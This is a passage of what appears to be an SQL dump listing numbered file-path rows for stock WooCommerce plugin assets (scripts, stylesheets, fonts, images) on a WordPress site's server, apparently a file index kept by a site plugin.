ummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.asset.php'),(6929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.js'),(6930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.asset.php'),(6931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.js'),(6932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.asset.php'),(6933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.js'),(6934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.asset.php'),(6935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.js'),(6936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.asset.php'),(6937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.js'),(6938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.asset.php'),(6939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.js'),(6940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.asset.php'),(6941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.js'),(6942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/wc-addons-tour.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/wc-addons-tour.asset.php'),(6943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/wc-addons-tour.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/wc-addons-tour.js'),(6944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/_animation.scss','wp-content/plugins/woocommerce/assets/css/_animation.scss'),(6945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/_fonts.scss','wp-content/plugins/woocommerce/assets/css/_fonts.scss'),(6946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/_mixins.scss','wp-content/plugins/woocommerce/assets/css/_mixins.scss'),(6947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/_variables.scss','wp-content/plugins/woocommerce/assets/css/_variables.scss'),(6948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/activation-rtl.css','wp-content/plugins/woocommerce/assets/css/activation-rtl.css'),(6949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/activation.css','wp-content/plugins/woocommerce/assets/css/activation.css'),(6950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/activation.scss','wp-content/plugins/woocommerce/assets/css/activation.scss'),(6951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin-rtl.css','wp-content/plugins/woocommerce/assets/css/admin-rtl.css'),(6952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin.css','wp-content/plugins/woocommerce/assets/css/admin.css'),(6953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin.scss','wp-content/plugins/woocommerce/assets/css/admin.scss'),(6954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth-rtl.css','wp-content/plugins/woocommerce/assets/css/auth-rtl.css'),(6955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth.css','wp-content/plugins/woocommerce/assets/css/auth.css'),(6956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth.scss','wp-content/plugins/woocommerce/assets/css/auth.scss'),(6957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-rtl.css','wp-content/plugins/woocommerce/assets/css/dashboard-rtl.css'),(6958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup-rtl.css','wp-content/plugins/woocommerce/assets/css/dashboard-setup-rtl.css'),(6959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup.css','wp-content/plugins/woocommerce/assets/css/dashboard-setup.css'),(6960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup.scss','wp-content/plugins/woocommerce/assets/css/dashboard-setup.scss'),(6961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard.css','wp-content/plugins/woocommerce/assets/css/dashboard.css'),(6962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard.scss','wp-content/plugins/woocommerce/assets/css/dashboard.scss'),(6963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper-rtl.css','wp-content/plugins/woocommerce/assets/css/helper-rtl.css'),(6964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper.css','wp-content/plugins/woocommerce/assets/css/helper.css'),(6965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper.scss','wp-content/plugins/woocommerce/assets/css/helper.scss'),(6966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_0_aaaaaa_40x100.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_0_aaaaaa_40x100.png'),(6967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_75_ffffff_40x100.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_75_ffffff_40x100.png'),(6968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_55_fbf9ee_1x400.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_55_fbf9ee_1x400.png'),(6969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_65_ffffff_1x400.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_65_ffffff_1x400.png'),(6970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_dadada_1x400.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_dadada_1x400.png'),(6971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_e6e6e6_1x400.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_e6e6e6_1x400.png'),(6972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_95_fef1ec_1x400.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_95_fef1ec_1x400.png'),(6973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_highlight-soft_75_cccccc_1x100.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_highlight-soft_75_cccccc_1x100.png'),(6974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_222222_256x240.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_222222_256x240.png'),(6975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_2e83ff_256x240.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_2e83ff_256x240.png'),(6976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_454545_256x240.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_454545_256x240.png'),(6977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_888888_256x240.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_888888_256x240.png'),(6978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_cd0a0a_256x240.png','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_cd0a0a_256x240.png'),(6979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui-rtl.css','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui-rtl.css'),(6980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.css','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.css'),(6981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.min.css','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.min.css'),(6982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions-rtl.css','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions-rtl.css'),(6983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.css','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.css'),(6984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.scss','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.scss'),(6985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu-rtl.css','wp-content/plugins/woocommerce/assets/css/menu-rtl.css'),(6986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu.css','wp-content/plugins/woocommerce/assets/css/menu.css'),(6987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu.scss','wp-content/plugins/woocommerce/assets/css/menu.scss'),(6988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/network-order-widget-rtl.css','wp-content/plugins/woocommerce/assets/css/network-order-widget-rtl.css'),(6989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/network-order-widget.css','wp-content/plugins/woocommerce/assets/css/network-order-widget.css'),(6990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/network-order-widget.scss','wp-content/plugins/woocommerce/assets/css/network-order-widget.scss'),(6991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.css','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.css'),(6992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.min.css','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.min.css'),(6993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.png','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.png'),(6994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.svg','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.svg'),(6995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/preloader.gif','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/preloader.gif'),(6996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.css','wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.css'),(6997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css','wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css'),(6998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto-rtl.css','wp-content/plugins/woocommerce/assets/css/prettyPhoto-rtl.css'),(6999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto.css','wp-content/plugins/woocommerce/assets/css/prettyPhoto.css'),(7000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto.scss','wp-content/plugins/woocommerce/assets/css/prettyPhoto.scss'),(7001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/privacy-rtl.css','wp-content/plugins/woocommerce/assets/css/privacy-rtl.css'),(7002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/privacy.css','wp-content/plugins/woocommerce/assets/css/privacy.css'),(7003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/privacy.scss','wp-content/plugins/woocommerce/assets/css/privacy.scss'),(7004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/reports-print-rtl.css','wp-content/plugins/woocommerce/assets/css/reports-print-rtl.css'),(7005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/reports-print.css','wp-content/plugins/woocommerce/assets/css/reports-print.css'),(7006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/reports-print.scss','wp-content/plugins/woocommerce/assets/css/reports-print.scss'),(7007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/select2.css','wp-content/plugins/woocommerce/assets/css/select2.css'),(7008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/select2.scss','wp-content/plugins/woocommerce/assets/css/select2.scss'),(7009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-nineteen-rtl.css'),(7010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen.css','wp-content/plugins/woocommerce/assets/css/twenty-nineteen.css'),(7011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen.scss','wp-content/plugins/woocommerce/assets/css/twenty-nineteen.scss'),(7012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-seventeen-rtl.css'),(7013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen.css','wp-content/plugins/woocommerce/assets/css/twenty-seventeen.css'),(7014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen.scss','wp-content/plugins/woocommerce/assets/css/twenty-seventeen.scss'),(7015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin-rtl.css'),(7016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.css'),(7017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.scss','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.scss'),(7018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-rtl.css'),(7019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.css'),(7020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.scss','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.scss'),(7021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-rtl.css'),(7022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three-rtl.css'),(7023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.css'),(7024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.scss','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.scss'),(7025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two-rtl.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two-rtl.css'),(7026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.css'),(7027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.scss','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.scss'),(7028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty.css','wp-content/plugins/woocommerce/assets/css/twenty-twenty.css'),(7029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty.scss','wp-content/plugins/woocommerce/assets/css/twenty-twenty.scss'),(7030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup-rtl.css','wp-content/plugins/woocommerce/assets/css/wc-setup-rtl.css'),(7031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup.css','wp-content/plugins/woocommerce/assets/css/wc-setup.css'),(7032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup.scss','wp-content/plugins/woocommerce/assets/css/wc-setup.scss'),(7033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme-rtl.css','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme-rtl.css'),(7034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.css','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.css'),(7035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.scss','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.scss'),(7036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout-rtl.css','wp-content/plugins/woocommerce/assets/css/woocommerce-layout-rtl.css'),(7037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css','wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css'),(7038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.scss','wp-content/plugins/woocommerce/assets/css/woocommerce-layout.scss'),(7039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-rtl.css','wp-content/plugins/woocommerce/assets/css/woocommerce-rtl.css'),(7040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css'),(7041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css'),(7042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.scss','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.scss'),(7043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css','wp-content/plugins/woocommerce/assets/css/woocommerce.css'),(7044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce.scss','wp-content/plugins/woocommerce/assets/css/woocommerce.scss'),(7045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/WooCommerce.eot','wp-content/plugins/woocommerce/assets/fonts/WooCommerce.eot'),(7046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/WooCommerce.svg','wp-content/plugins/woocommerce/assets/fonts/WooCommerce.svg'),(7047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/WooCommerce.ttf','wp-content/plugins/woocommerce/assets/fonts/WooCommerce.ttf'),(7048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/WooCommerce.woff','wp-content/plugins/woocommerce/assets/fonts/WooCommerce.woff'),(7049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/star.eot','wp-content/plugins/woocommerce/assets/fonts/star.eot'),(7050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/star.svg','wp-content/plugins/woocommerce/assets/fonts/star.svg'),(7051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/star.ttf','wp-content/plugins/woocommerce/assets/fonts/star.ttf'),(7052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/star.woff','wp-content/plugins/woocommerce/assets/fonts/star.woff'),(7053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/dashboard-widget-setup.png','wp-content/plugins/woocommerce/assets/images/admin_notes/dashboard-widget-setup.png'),(7054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/filter-by-product-variations-note.svg','wp-content/plugins/woocommerce/assets/images/admin_notes/filter-by-product-variations-note.svg'),(7055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/marketing-jetpack-2x.png','wp-content/plugins/woocommerce/assets/images/admin_notes/marketing-jetpack-2x.png'),(7056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/calendar.png','wp-content/plugins/woocommerce/assets/images/calendar.png'),(7057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-google.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-google.svg'),(7058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-jetpack.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-jetpack.svg'),(7059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-mailpoet.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-mailpoet.svg'),(7060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-pinterest.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-pinterest.svg'),(7061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-tiktok.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-tiktok.svg'),(7062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-woo.svg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-woo.svg'),(7063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/dashboard-widget-setup.png','wp-content/plugins/woocommerce/assets/images/dashboard-widget-setup.png'),(7064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/empty-content.svg','wp-content/plugins/woocommerce/assets/images/empty-content.svg'),(7065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/eway-logo.jpg','wp-content/plugins/woocommerce/assets/images/eway-logo.jpg'),(7066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/help.png','wp-content/plugins/woocommerce/assets/images/help.png'),(7067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.png'),(7068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.svg'),(7069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.png'),(7070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.svg'),(7071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.png'),(7072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.svg'),(7073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.png'),(7074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.svg'),(7075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.png'),(7076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.svg'),(7077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.png'),(7078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.svg'),(7079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.png'),(7080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.svg'),(7081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.png','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.png'),(7082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.svg','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.svg'),(7083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/edit.png','wp-content/plugins/woocommerce/assets/images/icons/edit.png'),(7084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/external-link.svg','wp-content/plugins/woocommerce/assets/images/icons/external-link.svg'),(7085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/global-attributes-icon.svg','wp-content/plugins/woocommerce/assets/images/icons/global-attributes-icon.svg'),(7086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/gridicons-checkmark.svg','wp-content/plugins/woocommerce/assets/images/icons/gridicons-checkmark.s